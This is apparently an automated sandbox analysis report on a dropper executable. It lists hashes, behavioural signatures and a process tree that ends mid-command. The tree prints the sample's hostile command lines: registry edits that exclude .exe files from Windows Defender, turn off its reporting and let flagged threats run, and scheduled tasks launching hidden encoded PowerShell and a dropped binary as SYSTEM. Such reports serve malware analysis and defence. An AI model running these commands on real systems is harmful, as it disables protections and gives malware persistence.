Analysis
- max time kernel: 122s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 06-02-2023 23:34

Static task: static1
Behavioral task: behavioral1
- Sample: file.exe
- Resource: win7-20220901-en
General
- Target: file.exe
- Size: 7.3MB
- MD5: 2a394e4469901863d1e0ba494b73af77
- SHA1: 7dca5a43f451705c80ca73aba9f97b21e1a78c6a
- SHA256: d423233f708e0af70448c973ff07ab25c072a1fe01006ea47ea664c3d371a3ed
- SHA512: a160fff21bc7faef45fa2185ed854e3223ba6232b01761815e7ab8c6775b77b84989799b6702f87ea21e3dd0ca811111a9963b177529d61131d9b392cbd0acd6
- SSDEEP: 196608:91OIM6e41Qo8DYFol79VtoicAk9YuxSCS/pDF5YwERvq6:3Op141Qo2c+xVt9oY4/SP5YwCq6
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
Processes:
- flow 53, pid 4992, rundll32.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (rundll32.exe)

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (Install.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (aTeDbPf.exe)

Executes dropped EXE (4 IoCs)
Processes:
- pid 4960 Install.exe
- pid 4868 Install.exe
- pid 3828 FdzMbCA.exe
- pid 5080 aTeDbPf.exe

Loads dropped DLL (1 IoC)
Processes:
- pid 4992 rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension (1 IoC)
Processes:
- File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json (aTeDbPf.exe)

Drops desktop.ini file(s) (1 IoC)
Processes:
- File opened for modification: C:\$RECYCLE.BIN\S-1-5-18\desktop.ini (aTeDbPf.exe)
Drops file in System32 directory (27 IoCs)
Processes:
- File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (FdzMbCA.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA (aTeDbPf.exe)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C (aTeDbPf.exe)
- File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 (aTeDbPf.exe)
- File created: C:\Windows\system32\GroupPolicy\gpt.ini (Install.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache (aTeDbPf.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C (aTeDbPf.exe)
- File opened for modification: C:\Windows\system32\GroupPolicy\gpt.ini (FdzMbCA.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 (aTeDbPf.exe)
Drops file in Program Files directory (14 IoCs)
Processes:
- File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (aTeDbPf.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (aTeDbPf.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja (aTeDbPf.exe)
- File created: C:\Program Files (x86)\RIuAFuLLU\qIsntF.dll (aTeDbPf.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (aTeDbPf.exe)
- File created: C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml (aTeDbPf.exe)
- File created: C:\Program Files (x86)\FpvksngNCKIjC\hkxIwaD.dll (aTeDbPf.exe)
- File created: C:\Program Files (x86)\cfvymemHCAUn\gVYGOpK.dll (aTeDbPf.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (aTeDbPf.exe)
- File created: C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml (aTeDbPf.exe)
- File created: C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\LeMcYrp.dll (aTeDbPf.exe)
- File created: C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml (aTeDbPf.exe)
- File created: C:\Program Files (x86)\QqSrWmvdGtwU2\kqTIwsJnJtNFa.dll (aTeDbPf.exe)
- File created: C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml (aTeDbPf.exe)

Drops file in Windows directory (4 IoCs)
Processes:
- File created: C:\Windows\Tasks\bCfEGNwGDQwhWneLvC.job (schtasks.exe)
- File created: C:\Windows\Tasks\cfFFKgQyvKFYWQGgS.job (schtasks.exe)
- File created: C:\Windows\Tasks\qcUOvNLqmSmqpxF.job (schtasks.exe)
- File created: C:\Windows\Tasks\vdoHbRZAyoFFuVbVu.job (schtasks.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 11 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- pid 1152 schtasks.exe
- pid 3556 schtasks.exe
- pid 4280 schtasks.exe
- pid 3808 schtasks.exe
- pid 1560 schtasks.exe
- pid 1928 schtasks.exe
- pid 2268 schtasks.exe
- pid 4236 schtasks.exe
- pid 1988 schtasks.exe
- pid 4724 schtasks.exe
- pid 2844 schtasks.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
Processes:
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
Modifies data under HKEY_USERS (64 IoCs)
Processes:
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (aTeDbPf.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix (rundll32.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" (aTeDbPf.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume (aTeDbPf.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000} (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\NukeOnDelete = "0" (aTeDbPf.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (rundll32.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\MaxCapacity = "15140" (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer (aTeDbPf.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (aTeDbPf.exe)
Suspicious behavior: EnumeratesProcesses (44 IoCs)
Processes:
- pid 3736 powershell.EXE (2 entries)
- pid 2452 powershell.exe (2 entries)
- pid 5052 powershell.exe (2 entries)
- pid 4312 powershell.EXE (2 entries)
- pid 5080 aTeDbPf.exe (36 entries)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
- Token: SeDebugPrivilege, pid 3736 powershell.EXE
- Token: SeDebugPrivilege, pid 2452 powershell.exe
- Token: SeDebugPrivilege, pid 5052 powershell.exe
- Token: SeDebugPrivilege, pid 4312 powershell.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid/process -> target pid/process; the report logs each pair once per write, count in parentheses; the list is capped at 64 entries):
- 3220 file.exe -> 4960 Install.exe (3)
- 4960 Install.exe -> 4868 Install.exe (3)
- 4868 Install.exe -> 3468 forfiles.exe (3)
- 4868 Install.exe -> 672 forfiles.exe (3)
- 672 forfiles.exe -> 1504 cmd.exe (3)
- 3468 forfiles.exe -> 2356 cmd.exe (3)
- 2356 cmd.exe -> 3860 reg.exe (3)
- 1504 cmd.exe -> 1484 reg.exe (3)
- 2356 cmd.exe -> 1452 reg.exe (3)
- 1504 cmd.exe -> 992 reg.exe (3)
- 4868 Install.exe -> 2844 schtasks.exe (3)
- 4868 Install.exe -> 2268 schtasks.exe (3)
- 3736 powershell.EXE -> 2568 gpupdate.exe (2)
- 4868 Install.exe -> 2664 schtasks.exe (3)
- 4868 Install.exe -> 4280 schtasks.exe (3)
- 3828 FdzMbCA.exe -> 2452 powershell.exe (3)
- 2452 powershell.exe -> 3852 cmd.exe (3)
- 3852 cmd.exe -> 3764 reg.exe (3)
- 2452 powershell.exe -> 616 reg.exe (3)
- 2452 powershell.exe -> 2000 reg.exe (3)
- 2452 powershell.exe -> 1508 reg.exe (3)
- 2452 powershell.exe -> 3928 reg.exe (2, cut off by the 64-entry cap)
Processes
(The bracketed number is the depth in the process tree; each entry lists the image path, the command line, and the signatures that fired on it.)

- [level 1] C:\Users\Admin\AppData\Local\Temp\file.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of WriteProcessMemory
- [level 2] C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exe
  Command line: .\Install.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- [level 3] C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exe
  Command line: .\Install.exe /S /site_id "525403"
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Suspicious use of WriteProcessMemory
- [level 4] C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
  - Suspicious use of WriteProcessMemory
- [level 5] C:\Windows\SysWOW64\cmd.exe
  Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
- [level 6] \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
- [level 6] \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
- [level 4] C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
  - Suspicious use of WriteProcessMemory
- [level 5] C:\Windows\SysWOW64\cmd.exe
  Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
- [level 6] \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
- [level 6] \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
- [level 4] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "gxyWKknki" /SC once /ST 00:28:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (The -EncodedCommand payload is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)
- [level 4] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "gxyWKknki"
- [level 4] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "gxyWKknki"
- [level 4] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "bCfEGNwGDQwhWneLvC" /SC once /ST 00:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe\" pb /site_id 525403 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
- [level 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (Same payload as the gxyWKknki task above: start-process -WindowStyle Hidden gpupdate.exe /force; the gpupdate.exe child below is that command running.)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [level 2] C:\Windows\system32\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force
- [level 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
- [level 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
- [level 1] C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
- [level 1] C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe pb /site_id 525403 /S
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
- [level 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 